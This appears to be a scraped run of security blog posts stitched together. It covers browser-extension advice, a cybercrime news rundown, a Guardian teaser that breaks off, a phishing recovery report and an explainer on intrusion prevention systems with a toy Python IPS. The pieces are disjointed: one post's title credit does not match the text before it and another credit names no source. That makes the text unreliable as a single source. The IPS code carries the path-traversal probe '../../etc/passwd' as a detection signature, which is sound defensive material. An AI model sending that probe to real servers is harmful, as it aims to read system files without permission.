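    for ext_id, findings in audit_all(INSTALLED, ALLOWLIST).items():
        print(ext_id, "->", "; ".join(findings))
```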

Advice for Consumers

The most obvious recommendation would be not to install any extensions at all. But if you need to, only keep the few add-ons that you really depend on. What’s more, browser extensions should come from trusted, reputable sources and not from unknown sites or companies.

By using DNS and IP filtering in combination with traffic monitoring and firewalls, both consumers and companies will play their part in the fight against cybercriminals. And this is something that we must all start with as soon as possible, Morten Kjaersgaard concludes.

Swedish speakers can read the full interview with Morten Kjaersgaard, Heimdal Security’s CEO, here.

Does your company need a cybersecurity solution to prevent Spyware and the most advanced types of malware?

Get in touch today to learn how we can help you.


The post SECURITY ALERT: Massive Data Leak Revealed the Sensitive Information of Millions of People appeared first on Heimdal Security Blog.

Cyber News Rundown: Deepfake Voice Fraud


Deepfake BEC Scam 

A new variant of the well-known BEC scam has implemented a feature that has yet to be used in an email scam: voice fraud. Using an extremely accurate deepfake voice of a company’s CEO, scammers were able to successfully convince another company to wire $250,000 with the promise of a quick return. Unfortunately, that transfer was quickly spread out through a number of countries, leaving investigators with very few clues as to the identity of the scammers.

Yves Rocher Data Leak 

The customer databases belonging to French retailer Yves Rocher were found to be publicly available by researchers who discovered the records of over 2.5 million customers. In addition to the personal data, details for over 6 million transactions and internal Yves Rocher information were included in the exposed database. The internal data could be a major opportunity for competitors to gain a crucial foothold in the marketplace.

German Mastercard Breach 

Officials recently learned of a data breach affecting nearly 90,000 German Mastercard holders who are part of its members’ loyalty program. Nearly half of the exposed email addresses had already been compromised in previous data breaches, according to Have I Been Pwned, though the affected customers should still update their credentials. Fortunately, this breach only affected the loyalty program members rather than the entirety of Mastercard’s worldwide client base.

Ransomware Wave Hits US 

Continuing on from a summer full of ransomware attacks on US cities comes a streak of 13 new attacks that range from the East Coast to the West Coast. Sadly, several of the victims have already paid out some portion of the demanded ransoms, with some insurance companies even attempting to negotiate with the attackers for a lower payout. With this streak, the total number of ransomware attacks in the US in 2019 is up to 149, 20% of which involved educational institutions.   

UK Travel Agency Breach 

A UK-based travel agency has recently fallen victim to a data breach that could affect over 200,000 of its customers. The main leak included audio files of the affected customers confirming travel and payment plans, as the travel firm completes its deals over the phone. The audio files appear to have been publicly available for a span of nearly 3 years, but the firm quickly secured the sensitive information once it was informed of the exposure.

The post Cyber News Rundown: Deepfake Voice Fraud appeared first on Webroot Blog.

Guardian investigations: how tech helps tackle big data … and big lawyers

Our head of investigations explains how a new IT system, Giant, has the power to find needles in journalistic haystacks

There aren’t too many places to hide at the Guardian. The offices are open-plan and most of the meeting rooms have glass walls.

There is one room, however, that has a special status. In recent years, when we have been involved in big investigations, this is the place where reporters and editors have relocated for months on end.


Unalaska Recovers $2.3 Million Following Phishing Attack

The Alaskan city of Unalaska has recovered approximately $2.3 million after digital fraudsters targeted it with a phishing attack. Erin Reinders, city manager of Unalaska, revealed that the municipality had recovered $2,347,544.43 on 22 August. That amount constituted a large part of the $2,985,406.10 total which the City had sent to scammers. Per Reinders’ comments, […]… Read More

The post Unalaska Recovers $2.3 Million Following Phishing Attack appeared first on The State of Security.

What Is an Intrusion Prevention System?

When you need a tool to find and detect malicious activity within a network, an intrusion prevention system (IPS) fills that role. It first detects malicious activity in the network, reports on what it found, and then tries to block or stop that activity from continuing.

An intrusion prevention system expands the capabilities of an intrusion detection system (IDS), which monitors network and system traffic. The advantage of an IPS over an IDS is that the IPS sits in-line, on the path between source and destination, and can therefore block malicious activity from occurring in the network rather than only reporting it.

How Do Intrusion Prevention Systems Work?

Usually found behind a firewall, an intrusion prevention system functions as an additional layer of filtering for malicious activity. If something gets through the firewall, the IPS is there to catch it. An IPS is capable of analyzing and taking action on network traffic. Actions include sending alerts to admins, dropping potentially dangerous packets, stopping all traffic from a source of malicious activity, and even resetting connections.

It is important to note, however, that an IPS should be efficient so it does not hinder the performance of the network. At the same time, the intrusion prevention system should be able to act quickly and accurately to catch malicious activity in real time while keeping false positives to a minimum, since a false positive on an in-line device blocks legitimate traffic.

How an Intrusion Prevention System Detects Malicious Activities

There are several ways that an intrusion prevention system can find and detect malicious activity. The two main methods are signature-based detection and statistical anomaly-based detection.

Signature-based detection uses a dictionary of identifiable signatures, i.e. patterns found in the code or traffic of a known exploit. This can be categorized further into two methods: vulnerability-facing and exploit-facing. The first detects malicious activity aimed at a specific network vulnerability, regardless of which exploit is used, while the second checks for the patterns of a particular known attack.

For statistical anomaly-based detection, intrusion prevention systems take samples of network traffic and compare them to a predetermined baseline of normal behavior. If something deviates from the baseline, the IPS sends out an alert or takes action.
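The two detection methods and the in-line actions described above, as an added example that is not code from the original article: a toy IPS with an exploit-facing signature, a vulnerability-facing size rule for a hypothetical service on port 8080, and a per-interval anomaly check against a rolling baseline (all signatures, rules and traffic are constructed).

```python
"""Toy in-line IPS combining signature-based and anomaly-based detection. Added
example, not from the original article; signatures, rule and traffic are constructed."""
from collections import deque
from dataclasses import dataclass, field
import statistics

@dataclass
class Packet:
    src: str
    dst_port: int
    payload: bytes
# Exploit-facing signature: a byte pattern characteristic of one attack tool (constructed).
EXPLOIT_SIGNATURES = {b"../../etc/passwd": "path traversal probe"}
# Vulnerability-facing rule: the hypothetical service on 8080 mishandles requests over 512 bytes.
VULN_RULES = {8080: ("oversized request to fragile web app", 512)}

@dataclass
class Ips:
    sigma: float = 3.0      # alert when an interval exceeds mean + sigma * stdev
    blocked: set = field(default_factory=set)
    alerts: list = field(default_factory=list)
    history: deque = field(default_factory=lambda: deque(maxlen=10))  # baseline intervals
    interval_count: int = 0

    def inspect(self, pkt: Packet) -> str:
        """In-line verdict for one packet: 'forward', 'drop' or 'block'."""
        self.interval_count += 1
        if pkt.src in self.blocked:                 # source already cut off
            return "drop"
        for sig, name in EXPLOIT_SIGNATURES.items():
            if sig in pkt.payload:                  # exploit-facing match
                self.blocked.add(pkt.src)           # stop all further traffic from it
                self.alerts.append(f"{name} from {pkt.src}: source blocked")
                return "block"
        rule = VULN_RULES.get(pkt.dst_port)
        if rule and len(pkt.payload) > rule[1]:     # vulnerability-facing match
            self.alerts.append(f"{rule[0]} from {pkt.src}: packet dropped")
            return "drop"
        return "forward"

    def end_interval(self):
        """Anomaly check: compare this interval's packet count with the baseline."""
        count, self.interval_count = self.interval_count, 0
        alert = None
        if len(self.history) >= 3:                  # need some baseline first
            mean, sd = statistics.mean(self.history), statistics.pstdev(self.history)
            if count > mean + self.sigma * max(sd, 1.0):   # floor stdev so a flat baseline still works
                alert = f"traffic spike: {count} packets vs baseline {mean:.1f}"
                self.alerts.append(alert)
        self.history.append(count)
        return alert
```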

Comparing Intrusion Prevention Systems

There are four common types of intrusion prevention system. First is the network-based intrusion prevention system, which has the ability to check and monitor the entire network for suspicious activity based on protocol activity.

A wireless intrusion prevention system, on the other hand, checks wireless network protocols to catch anomalies and suspicious activity.

Network behavior analysis checks the network traffic flow for unusual activity such as a spike in traffic or anything else out of the ordinary, like a DDoS attack.

The final common type is the host-based intrusion prevention system, which is installed software that checks a single host for suspicious activity.

Which Intrusion Prevention System to Use?

There are many offerings when it comes to intrusion prevention systems. To choose the best one, set a budget first, define the requirements of your network, and then research the different systems available on the market to see whether they fit what you need.

Remember, an intrusion prevention system is not a comprehensive security solution. While it can be a valuable asset in any organization’s security for detecting malicious activity, other tools are needed for endpoint security, data protection, incident response, and more.


The post What Is an Intrusion Prevention System? appeared first on .